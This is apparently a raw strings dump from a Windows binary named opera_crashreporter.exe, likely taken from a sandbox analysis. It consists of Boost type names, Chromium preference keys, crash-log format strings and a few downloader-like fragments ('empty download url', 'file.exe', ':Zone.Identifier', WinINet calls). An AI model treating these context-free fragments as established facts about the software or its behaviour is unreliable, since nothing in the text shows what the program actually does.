.?AU?$concrete_parser@U?$sequence@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_s@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$alternative@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$list_parser@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@U?$chlit@D@234@Uno_list_endtoken@234@Uplain_parser_category@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@U?$chlit@D@classic@spirit@boost@@Ua_object_e@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$alternative@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@V1234@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Uend_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$abstract_parser@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@

.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@

.PA_W

KERNEL32.DLL

mscoree.dll

wininet.dll

kernel32.dll

user32.dll

shell32.dll

advapi32.dll

comctl32.dll

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

https

Error getting HTTP status #

Error HTTP status

wrong file url

e:Zone.Identifier

empty download url

file.exe

banner_url

Shell32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG

windows

c:\%original file name%.exe

opera_crashreporter.exe_1148:

.text

`.rdata

@.data

@.rsrc

@.reloc

D$4j.Xf

w%s(

j.Yf;

_tcPVj@

.PjRW

Opera\Opera

Opera\Opera x64

Google\Chrome\User Data

c:\buildbot\slave\w\lar6\desktop-2013-5\desktop\windows\crash_reporter\crash_reporter_main.cc

crash-reporter-parent-id

crash-reporter-exception-info

0.0.0.0

27.0.1689.69

OPERA-CRASHLOG V1 desktop %s %d windows release

%S caused exception %X at address 2lX (BASE: 00000000)

process_type="crash_reporter"

opera-crashlog-%u-%lu.txt

-%u-%lu

c:\buildbot\slave\w\lar6\desktop-2013-5\desktop\windows\crash_reporter\process_state_impl.cc

Thread32First failed, te.dwSize=

profile.ephemeral_mode

profile.icon_version

session.restore_on_startup

session.restore_on_startup_migrated

session.startup_urls_migration_time

profile.exited_cleanly

profile.exit_type

profile.managed.custodian_email

profile.managed.custodian_name

profile.managed.custodian_profile_image_url

profile.managed.custodian_profile_url

profile.managed.manual_hosts

profile.managed.manual_urls

profile.managed.second_custodian_email

profile.managed.second_custodian_name

profile.managed.second_custodian_profile_image_url

profile.managed.second_custodian_profile_url

profile.managed.shared_settings

session.startup_urls

session.urls_to_restore_on_startup

intl.app_locale

intl.charset_default

intl.accept_languages

intl.static_encodings

webkit.webprefs.fonts.standard.Zyyy

webkit.webprefs.fonts.fixed.Zyyy

webkit.webprefs.fonts.serif.Zyyy

webkit.webprefs.fonts.sansserif.Zyyy

webkit.webprefs.fonts.cursive.Zyyy

webkit.webprefs.fonts.fantasy.Zyyy

webkit.webprefs.fonts.pictograph.Zyyy

webkit.webprefs.fonts.standard

webkit.webprefs.fonts.fixed

webkit.webprefs.fonts.serif

webkit.webprefs.fonts.sansserif

webkit.webprefs.fonts.cursive

webkit.webprefs.fonts.fantasy

webkit.webprefs.fonts.pictograph

webkit.webprefs.fonts.standard.Arab

webkit.webprefs.fonts.fixed.Arab

webkit.webprefs.fonts.serif.Arab

webkit.webprefs.fonts.sansserif.Arab

webkit.webprefs.fonts.standard.Cyrl

webkit.webprefs.fonts.fixed.Cyrl

webkit.webprefs.fonts.serif.Cyrl

webkit.webprefs.fonts.sansserif.Cyrl

webkit.webprefs.fonts.standard.Grek

webkit.webprefs.fonts.fixed.Grek

webkit.webprefs.fonts.serif.Grek

webkit.webprefs.fonts.sansserif.Grek

webkit.webprefs.fonts.standard.Jpan

webkit.webprefs.fonts.fixed.Jpan

webkit.webprefs.fonts.serif.Jpan

webkit.webprefs.fonts.sansserif.Jpan

webkit.webprefs.fonts.standard.Hang

webkit.webprefs.fonts.fixed.Hang

webkit.webprefs.fonts.serif.Hang

webkit.webprefs.fonts.sansserif.Hang

webkit.webprefs.fonts.cursive.Hang

webkit.webprefs.fonts.standard.Hans

webkit.webprefs.fonts.fixed.Hans

webkit.webprefs.fonts.serif.Hans

webkit.webprefs.fonts.sansserif.Hans

webkit.webprefs.fonts.standard.Hant

webkit.webprefs.fonts.fixed.Hant

webkit.webprefs.fonts.serif.Hant

webkit.webprefs.fonts.sansserif.Hant

webkit.webprefs.default_font_size

webkit.webprefs.default_fixed_font_size

webkit.webprefs.minimum_font_size

webkit.webprefs.minimum_logical_font_size

webkit.webprefs.javascript_enabled

webkit.webprefs.web_security_enabled

webkit.webprefs.javascript_can_open_windows_automatically

webkit.webprefs.loads_images_automatically

webkit.webprefs.plugins_enabled

webkit.webprefs.dom_paste_enabled

webkit.webprefs.shrinks_standalone_images_to_fit

webkit.webprefs.uses_universal_detector

webkit.webprefs.text_areas_are_resizable

webkit.webprefs.java_enabled

webkit.webprefs.tabs_to_links

webkit.webprefs.allow_displaying_insecure_content

webkit.webprefs.allow_running_insecure_content

safebrowsing.enabled

safebrowsing.extended_reporting_enabled

safebrowsing.proceed_anyway_disabled

safebrowsing.incident_report_sent

safebrowsing.incidents_sent

incognito.mode_availability

search.suggest_enabled

browser.confirm_to_quit

security.cookie_behavior

download.prompt_for_download

alternate_error_pages.enabled

dns_prefetching.startup_list

dns_prefetching.host_referral_list

spdy.disabled

net.http_server_properties

spdy.servers

spdy.alternate_protocol

protocol.disabled_schemes

instant_ui.zero_suggest_url_prefix

local_state.multiple_profile_prefs_version

dns_prefetching.enabled

net.network_prediction_options

net.use_proxy_for_local_servers

hide_web_store_icon

browser.show_home_button

profile.recently_selected_encodings

browser.clear_data.browsing_history

browser.clear_data.download_history

browser.clear_data.cache

browser.clear_data.cookies

browser.clear_data.passwords

browser.clear_data.form_data

browser.clear_data.hosted_apps_data

browser.clear_data.content_licenses

browser.enable_spellchecking

browser.speechinput_censor_results

browser.speechinput_tray_notification_shown_contexts

browser.enabled_labs_experiments

browser.enable_autospellcorrect

history.saving_disabled

history.deleting_enabled

settings.force_safesearch

settings.history_recorded

browser.clear_data.time_period

browser.last_clear_browsing_data_time

extensions.theme.pack

extensions.theme.id

extensions.theme.images

extensions.theme.colors

extensions.theme.tints

extensions.theme.properties

extensions.ui.developer_mode

extensions.ui.dismissed_adt_promo

extensions.commands

plugins.last_internal_directory

plugins.plugins_list

plugins.plugins_disabled

plugins.plugins_disabled_exceptions

plugins.plugins_enabled

plugins.migrated_to_pepper_flash

plugins.removed_old_component_pepper_flash_settings

plugins.show_details

plugins.allow_outdated

plugins.always_authorize

browser.check_default_browser

browser.default_browser_setting_enabled

browser.custom_chrome_frame

profile.content_settings.plugin_whitelist

profile.block_third_party_cookies

profile.clear_site_data_on_exit

partition.default_zoom_level

profile.default_zoom_level

partition.per_host_zoom_levels

profile.per_host_zoom_levels

autofill.data_model_default

autofill.pay_without_wallet

autofill.wallet_location_disclosure

autofill.save_data

autofill.wallet_shipping_same_as_billing

autofill.generated_card_bubble_times_shown

autofill.rac_dialog_defaults

enable_deprecated_web_platform_features

import_autofill_form_data

import_bookmarks

import_history

import_home_page

import_saved_passwords

import_search_engine

profile.avatar_index

profile.using_default_name

profile.name

profile.using_default_avatar

profile.using_gaia_avatar

profile.managed_user_id

profile.gaia_info_update_time

profile.gaia_info_picture_url

profile.avatar_bubble_tutorial_shown

printing.enabled

printing.print_preview_disabled

profile.managed.default_filtering_behavior

profile.managed_user_creation_allowed

profile.managed_users

profile.reset_prompt_memento

message_center.disabled_extension_ids

message_center.disabled_system_component_ids

message_center.welcome_notification_dismissed

message_center.welcome_notification_dismissed_local

message_center.welcome_notification_previously_popped_up

message_center.welcome_notification_expiration_timestamp

fullscreen.allowed

local_discovery.notifications_enabled

prefs.preference_reset_time

gcm.channel_enabled

gcm.push_messaging_registration_count

easy_unlock.allowed

easy_unlock.enabled

easy_unlock.pairing

easy_unlock.proximity_required

easy_unlock.show_tutorial

zerosuggest.cachedresults

ssl.rev_checking.enabled

ssl.rev_checking.required_for_local_anchors

ssl.version_min

ssl.version_max

ssl.version_fallback_min

ssl.cipher_suites.blacklist

ssl.ssl_record_splitting.disabled

ssl.ssl_blocking_bypassed

user_experience_metrics.reporting_enabled

profile.last_used

profile.last_active_profiles

profile.profiles_created

profile.info_cache

profile.created_by_version

profile.reset_prompt_mementos

user_experience_metrics.stability.page_load_count

user_experience_metrics.stability.renderer_crash_count

user_experience_metrics.stability.extension_renderer_crash_count

user_experience_metrics.stability.renderer_hang_count

user_experience_metrics.stability.child_process_crash_count

user_experience_metrics.stability.other_user_crash_count

user_experience_metrics.stability.kernel_crash_count

user_experience_metrics.stability.system_unclean_shutdowns

user_experience_metrics.stability.plugin_stats2

uninstall_metrics.page_load_count

uninstall_metrics.last_launch_time_sec

uninstall_metrics.last_observed_running_time_sec

browser.suppress_default_browser_prompt_for_version

browser.window_placement

browser.window_placement_popup

task_manager.window_placement

browser.app_window_placement

renderer.memory_cache.size

download.default_directory

download.extensions_to_open

download.directory_upgrade

download.torrent_enable

download.open_pdf_in_system_reader

savefile.default_directory

savefile.type

select_file_dialogs.allowed

filebrowser.tasks.default_by_mime_type

filebrowser.tasks.default_by_suffix

selectfile.last_directory

browser.hung_plugin_detect_freq

browser.plugin_message_response_timeout

spellcheck.dictionary

spellcheck.use_spelling_service

protocol_handler.excluded_schemes

safe_browsing.client_key

safe_browsing.wrapped_key

options_window.last_tab_index

certificate_manager_window.last_tab_index

browser.last_redirect_origin

shutdown.type

shutdown.num_processes

shutdown.num_processes_slow

restart.last.session.on.shutdown

was.restarted

relaunch.mode

extensions.disabled

plugins.disable_plugin_finder

ntp.app_page_names

ntp.collapsed_open_tabs

ntp.collapsed_foreign_sessions

ntp.collapsed_recently_closed_tabs

ntp.collapsed_snapshot_document

ntp.collapsed_sync_promo

ntp.date_resource_server

ntp.most_visited_blacklist

ntp.promo_desktop_session_found

ntp.promo_resource_cache_update

ntp.shown_bookmarks_folder

ntp.shown_page

ntp.tips_resource_server

ntp.webstore_enabled

devtools.adb_key

devtools.disabled

devtools.discover_usb_devices

devtools.edited_files

devtools.file_system_paths

devtools.open_docked

devtools.port_forwarding_enabled

devtools.port_forwarding_default_set

devtools.port_forwarding_config

google.services.password_hash

invalidation_service.use_gcm_channel

sync_promo.startup_count

sync_promo.user_skipped

sync_promo.show_on_first_run_allowed

sync_promo.show_ntp_bubble

browser.web_app.create_on_desktop

browser.web_app.create_in_apps_menu

browser.web_app.create_in_quick_launch_bar

geolocation.access_token

media.default_audio_capture_device

media.default_video_capture_Device

media.device_id_salt

remote_access.host_firewall_traversal

remote_access.host_require_two_factor

remote_access.host_domain

remote_access.host_talkgadget_prefix

remote_access.host_require_curtain

remote_access.host_allow_client_pairing

remote_access.host_allow_gnubby_auth

remote_access.host_allow_relayed_connection

remote_access.host_udp_port_range

printing.print_preview_sticky_settings

cloud_print.dialog_size.width

cloud_print.dialog_size.height

cloud_print.signin_dialog_size.width

cloud_print.signin_dialog_size.height

cloud_print.enabled

cloud_print.proxy_id

cloud_print.auth_token

cloud_print.xmpp_auth_token

cloud_print.email

cloud_print.print_system_settings

cloud_print.enable_job_poll

cloud_print.robot_refresh_token

cloud_print.robot_email

cloud_print.user_settings.connectNewPrinters

cloud_print.xmpp_ping_enabled

cloud_print.xmpp_ping_timeout_sec

cloud_print.user_settings.printers

cloud_print.submit_enabled

cloud_print.user_settings

net.max_connections_per_proxy

hardware.audio_capture_enabled

hardware.audio_capture_allowed_urls

hardware.video_capture_enabled

hardware.video_capture_allowed_urls

hotword.search_enabled_2

hotword.always_on_search_enabled

hotword.audio_logging_enabled

hotword.audio_history_enabled

hotword.previous_language

browser.clear_lso_data_enabled

browser.pepper_flash_settings_enabled

browser.disk_cache_dir

browser.disk_cache_size

browser.media_cache_size

cros.system.releaseChannel

feedback.performance_tracing_enabled

background_contents.registered

browser.shown_autolaunch_infobar

auth.schemes

auth.disable_negotiate_cname_lookup

auth.enable_negotiate_port

auth.server_whitelist

auth.negotiate_delegate_whitelist

auth.gssapi_library_name

auth.allow_cross_origin_prompt

async_dns.enabled

custom_handlers.registered_protocol_handlers

custom_handlers.ignored_protocol_handlers

custom_handlers.policy.registered_protocol_handlers

custom_handlers.policy.ignored_protocol_handlers

custom_handlers.enabled

background_mode.enabled

hardware_acceleration_mode.enabled

policy.device_refresh_rate

message_center.showed_first_run_balloon

message_center.show_icon

message_center.was_forced_on_taskbar

browser.attempted_to_enable_autoupdate

media_galleries.gallery_id

media_galleries.remembered_galleries

media_galleries.last_scan_time

gesture.max_separation_for_gesture_touches_in_pixels

gesture.semi_long_press_time_in_ms

gesture.tab_scrub_activation_delay_in_ms

gesture.fling_max_cancel_to_down_time_in_ms

gesture.fling_max_tap_gap_time_in_ms

overscroll.horizontal_threshold_complete

overscroll.vertical_threshold_complete

overscroll.minimum_threshold_start

overscroll.minimum_threshold_start_touchpad

overscroll.vertical_threshold_start

overscroll.horizontal_resist_threshold

overscroll.vertical_resist_threshold

network_profile.warnings_left

network_profile.last_warning_time

turbo.enabled

turbo.url_blacklist

turbo.client_id

apps.app_launch_for_metro_restart

apps.app_launch_for_metro_restart_profile

apps.shortcuts_version

module_conflict.bubble_shown

settings.privacy.drm_salt

settings.privacy.drm_enabled

profile.extensions.activity_log.num_consumers_active

proxy.quick_check_enabled

profile.browser_guest_enabled

profile.add_person_enabled

easy_unlock.hardlock_state

password_bubble.timestamp

password_bubble.nopes

password_bubble.interactions

c:\buildbot\slave\w\lar6\desktop-2013-5\desktop\windows\crash_reporter\module_info_impl.cc

Could not find exports directory

c:\buildbot\slave\w\lar6\desktop-2013-5\desktop\windows\crash_reporter\thread_info_impl.cc

CHROME_ALLOCATOR

CHROME_ALLOCATOR_2

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\free_list.h

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\tcmalloc.cc

WASTE: committed/used ratio of %f

class = [ %8Iu bytes ] : %8I64u objs; %5.1f MiB; %5.1f cum MiB

PageHeap: %d sizes; %6.1f MiB free; %6.1f MiB unmapped

%6u pages * %6u spans ~ %6.1f MiB; %6.1f MiB cum; unmapped: %6.1f MiB; %6.1f MiB cum

>255 large * %6u spans ~ %6.1f MiB; %6.1f MiB cum; unmapped: %6.1f MiB; %6.1f MiB cum

generic.current_allocated_bytes

generic.heap_size

tcmalloc.slack_bytes

tcmalloc.pageheap_free_bytes

tcmalloc.pageheap_unmapped_bytes

tcmalloc.max_total_thread_cache_bytes

tcmalloc.current_total_thread_cache_bytes

tcmalloc.central

tcmalloc.transfer

tcmalloc.thread

tcmalloc.page

tcmalloc.page_unmapped

tcmalloc.large

tcmalloc.large_unmapped

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\page_heap_allocator.h

FATAL ERROR: Insufficient memory to guard internal tcmalloc data (%d bytes, object-size %d, guard-size %d)

I64x-I64x %c%c%c%c I64x x:x %-11I64d %s

This malloc implementation does not support sampling.

As of 2005/01/26, only tcmalloc supports sampling, and

heap_v2/%d

This malloc implementation does not support ReadHeapGrowthStackTraces().

As of 2005/09/27, only tcmalloc supports this, and you

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\common.cc

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\central_freelist.cc

ntdll.dll

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\stack_trace_table.cc

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\third_party\tcmalloc\chromium\src\free_list.cc

user.js

(0x%X)

Error (0x%X) while retrieving error. (0x%X)

CHROME_PROFILER_TIME

PlatformFile.UnknownErrors.Windows

0123456789

Histogram: %s recorded %d samples

(flags = 0x%x)

\uX

Unsupported encoding. JSON must be UTF-8.

Dictionary keys must be quoted.

(%d = %3.1f%%)

Line: %i, column: %i, %s

Histogram.InconsistentCountHigh

Histogram.InconsistentCountLow

enable-crash-reporter

full-memory-crash-report

OPERA-CRASHLOG V1 desktop %s %s windows release

%s caused exception %s at address lX

Thread: X

ThreadInfo: X

Priority=X

Crashed=%d

checked_context_values=%lu%s

checked_stack_values=%lu%s

Stack dump: X

%-26s %-46s Base: lX Size: X Timestamp: X

%s="%s"

Registers: X

EAX=X EBX=X ECX=X EDX=X ESI=X

EDI=X EBP=X ESP=X EIP=X FLAGS=X

CS=X DS=X SS=X ES=X FS=X GS=X

FPU stack: X

XXX XXX XXX

XXX XXX SW=X CW=X

crashlog.txt

apps-gallery-migrated-update-url

bypass-new-extension-toggle

crash-reporter-pid

extra-chrome-flags

featured-speeddial-extensions-feed-url

import-bookmarks

import-topsites-to-speeddial

import-session

presto-master-password

opera-sync-log

share-bookmarks-url

themes-gallery-download-url

welcome-page-url

sync-password

pack-extension-key

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\base\prefs\json_pref_store.cc

Settings.JsonDataSizeKilobytes.

CHROME_VERSION

>CHROME_SAFE_MODE

2676A9A2-D919-4FEE-9187-152100393AB2

Opera

SHELL32.dll

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

ImportantFile.TempFileFailures

c:\buildbot\slave\w\lar6\desktop-2013-5\chromium\src\base\files\important_file_writer.cc

base::ImportantFileWriter::ScheduleWrite

base::ImportantFileWriter::PostWriteTask

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

1.2.5

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

welcome-url

import_browser_data

c:\buildbot\slave\w\LAR6\desktop-2013-5\chromium\src\out\Release\opera_crashreporter.exe.pdb

SHFileOperationW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

HttpSendRequestW

HttpQueryInfoW

WININET.dll

PSAPI.DLL

WINMM.dll

SHLWAPI.dll

GetWindowsDirectoryW

ConnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeW

KERNEL32.dll

RegCloseKey

RegCreateKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

GetProcessHeap

GetCPInfo

6.1.7601

zcÁ

%Program Files% (x86)\Opera\27.0.1689.69\opera_crashreporter.exe

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>

6%6*606>6

5%6X6

0 0&090@0

=(>,>0>4>

;4<#=)>?>

: :$:(:,:0:4:8:<:

crash_feedback_url.txt

pdf.dll

Crash Reports

opera.pak

browser.js

siteprefs.json

4operaprefs.ini

OPERA_CRASH_KEEP_LOGS

OperaCrashReporterInitEvent

\\.\pipe\OperaCrashReporter

%s=%s

OperaCrashReporterMinidump

Last crash in crash reporter

OPERA_CRASH_EMAIL

gBreakpad/1.0 (Windows)

X-Opera-Crash-URL

OPERA_CRASH_SERVER_URL

hXXp://crash.opera.com/

opera_crashreporter.log

dbghelp.dll

OPERA_CRASH_LOG_DIR

active_url

Ndebug.log

.\debug.log

kernel32.dll

Chrome_MessagePumpWindow_%p

verifier.dll

rpcrt4.dll

x-x-x-xx-xxxxxx

Breakpad/1.0 (Windows)

%sXX

opera.exe

